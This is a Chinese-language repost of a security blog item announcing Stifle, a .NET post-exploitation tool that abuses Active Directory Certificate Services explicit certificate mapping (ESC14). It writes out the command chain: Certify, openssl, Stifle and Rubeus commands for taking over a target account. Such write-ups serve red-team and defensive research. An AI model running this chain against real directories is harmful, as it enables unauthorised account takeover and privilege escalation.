描述
大约一年前,SpecterOps 的Jonas Knudsen( @Jonas_B_KaltSecurityIdentities )发表了一篇题为“ADCS ESC14 滥用技术”的博客,介绍了一种利用 Active Directory 证书服务 (ADCS) 通过显式证书映射进行多种类型帐户接管的已知技术。他发布了一组用于生成和写入属性的 PowerShell 工具,作为滥用技术的主要变体。由于这种技术可以看作是持有对象写入原语时接管帐户的第三种主要方法(与 RBCD 和 Shadow Credentials 一起),我认为它需要自己的 .NET 工具,因为我注意到过去一年中没有发布过一个版本。
介绍 Stifle,一个非常简单的 .NET 后利用实用程序,它使用传递的证书在目标对象上设置显式证书映射,允许使用已持有的映射证书作为目标对象进行身份验证。
_______ ___ / ____| | (_)/ _| || (___ ||_ _||_|| ___ ___ | __| |_| |/ _ ____) | |_| || || __/ |_____/ __|_|_| |_|___| [*] Exploit explicit certificate mapping in Active Directory [*] Add an explicit certificate mapping on a target object by writing the required altSecurityIdentities value using a certificate and the certificate password: Stifle.exe add /object:target /certificate:MIIMrQI... /password:P@ssw0rd [*] Clear the altSecurityIdentities attribute, removing the explicit certificate mapping: Stifle.exe clear /object:target使用
首先使用 Certify 请求目标对象将映射到的证书(注意,请求的证书必须是机器帐户证书):
Certify.exe request /ca:lab.lanlab-dc01-ca /template:Machine /machine
然后将证书信息复制到.pem文件中,并使用基于 unix 的系统上的 openssl 二进制文件转换为 base64.pfx格式:
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export | base64 -w 0Stifle.exeadd /object:target /certificate:MIIMrQI... /password:P@ssw0rd
Rubeus.exeasktgt /user:target /certificate:MIIMrQI... /password:P@ssw0rd
原文始发于微信公众号(Ots安全):.NET 后利用实用程序,用于滥用 ADCS 中的显式证书映射
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论